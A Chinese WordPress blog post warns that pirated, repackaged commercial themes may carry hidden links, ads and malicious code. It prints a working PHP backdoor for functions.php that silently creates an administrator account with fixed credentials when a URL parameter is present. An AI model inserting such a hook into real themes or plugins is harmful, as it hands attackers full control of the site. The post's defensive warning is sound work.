小心!盗版主题中可能存在后门

前言

WordPress除了大量官方的主题,还有为数众多的主题设计者发布免费和收费主题,很多童鞋经常到处收集主题拿回来测试使用,其中一些无良者将收集到的国外商业收费主题进行汉化修改,添加暗链、广告,甚至恶意代码,然后免费或者收费公开发布出去,诱使别人下载使用,达到不可告人的目的。另外,这些商业收费主题一般都是测试版本,主题代码不完善、功能缺失,个别测试版的商业主题启用后会自动向数据库中写入大量数据…….


下面的代码更加邪恶,可以自动添加一个角色为管理员的用户。

add_action('wp_head', 'holeinthewall');
function holeinthewall() {
        If ($_GET['backdoor'] == 'go') {
                require('wp-includes/registration.php');
                If (!username_exists('username')) {
                        $user_id = wp_create_user('username', 'password');
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                }
        }
}

将代码添加到您当前主题的 functions.php 文件或插件中,会自动创建一个用户名:username 密码:password的有管理员权限的用户,之后想做什么都可以了。

所以,这里奉劝大家还是不要在自己的站点上使用盗版主题和插件,尽量到官方或原始发布站点下载主题,以免被开了后门也不知晓!

给TA买糖
共{{data.count}}人
人已赞赏
wordpress教程

wordpress拉黑恶意评论并且不写入数据库

2018-8-10 11:30:41

wordpress教程

自动将长URL网址留言标记为垃圾评论

2018-8-14 1:46:46

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索